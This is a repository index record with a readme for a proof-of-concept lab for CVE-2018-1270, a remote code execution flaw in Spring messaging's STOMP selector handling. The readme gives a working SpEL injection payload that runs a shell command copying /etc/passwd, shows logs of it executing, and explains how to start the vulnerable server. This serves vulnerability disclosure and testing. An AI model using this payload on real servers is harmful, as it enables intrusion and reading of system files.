{"id":13841372,"url":"https://github.com/CaledoniaProject/CVE-2018-1270","last_synced_at":"2025-07-11T12:31:37.773Z","repository":{"id":146440860,"uuid":"128482458","full_name":"CaledoniaProject/CVE-2018-1270","owner":"CaledoniaProject","description":"Spring messaging STOMP protocol RCE","archived":true,"fork":false,"pushed_at":"2018-04-12T05:48:24.000Z","size":474,"stargazers_count":114,"open_issues_count":0,"forks_count":24,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-08-05T17:27:22.354Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CaledoniaProject.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-04-07T00:14:33.000Z","updated_at":"2024-08-05T15:30:38.000Z","dependencies_parsed_at":"2023-03-30T11:07:12.850Z","dependency_job_id":null,"html_url":"https://github.com/CaledoniaProject/CVE-2018-1270","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CaledoniaProject%2FCVE-2018-1270/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CaledoniaProject","download_url":"https://codeload.github.com/CaledoniaProject/CVE-2018-1270/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225720402,"owners_count":17513597,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:09.550Z","updated_at":"2024-11-21T11:30:43.920Z","avatar_url":"https://github.com/CaledoniaProject.png","language":"Java","funding_links":[],"categories":["Java","Java (504)"],"sub_categories":[],"readme":"# CVE-2018-1270 - Spring messaging SpEL code execution vulnerability\n\nYesterday Spring disclosed an RCE vulnerability; see:\n\n* [CVE-2018-1270: Remote Code Execution with spring-messaging](https://pivotal.io/security/cve-2018-1270)\n\nAffected versions\n\n* Spring Framework 5.0 to 5.0.4\n* Spring Framework 4.3 to 4.3.14\n\nThis vulnerability has no special environment requirements: if you are using `spring-messaging + websocket + STOMP`, upgrade to the latest version as soon as possible; if you are using Spring Boot, upgrade to `2.0.1.RELEASE`.\n\n### Vulnerability details\n\nIn short, because `StandardEvaluationContext` is far too powerful and can evaluate arbitrary SpEL expressions, the Spring team added `SimpleEvaluationContext` from `Spring 5.0.5` onward; it supports simple data binding and keeps the flexibility without the security risk.\n\nspring-messaging provides STOMP protocol support, allowing clients to subscribe to messages and filter them with a selector, e.g.\n\n```\nselector = 'T(java.lang.Runtime).getRuntime().exec(\"cp /etc/passwd /tmp\")'\nstompClient = Stomp.client('ws://localhost:8080/hello')\nstompClient.connect({}, function(frame) {\n    stompClient.subscribe('/topic/greetings', function() {}, {\n        \"selector\": selector\n    })\n});\n```\n\nWhen you subscribe, Spring stores this filter and evaluates it whenever a message is delivered to the client, e.g.\n\n```\n2018-04-07 08:32:20 [clientInboundChannel-3] TRACE o.s.m.s.b.DefaultSubscriptionRegistry - Subscription selector: [T(java.lang.Runtime).getRuntime().exec(\"cp /etc/passwd /tmp\")]\n\n...\n\n2018-04-07 08:32:21 [MessageBroker-2] DEBUG o.s.m.s.b.DefaultSubscriptionRegistry - Failed to evaluate selector: EL1001E: Type conversion problem, cannot convert from java.lang.UNIXProcess to boolean\n```\n\nPoC screenshot\n\n![screenshot](contrib/screenshot.jpg)\n\nA detailed vulnerability analysis will be published later.\n\n### How to use this environment\n\nBuild and start the Spring Boot server:\n\n```\nmvn clean package\njava -jar target/spring-boot-websocket-1.0.jar\n```\n\nOpen the page and enter an expression to test:\n\n```\nhttp://localhost:8080\n```\n\n![screenshot](contrib/web.jpg)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCaledoniaProject%2FCVE-2018-1270","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FCaledoniaProject%2FCVE-2018-1270","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FCaledoniaProject%2FCVE-2018-1270/lists"}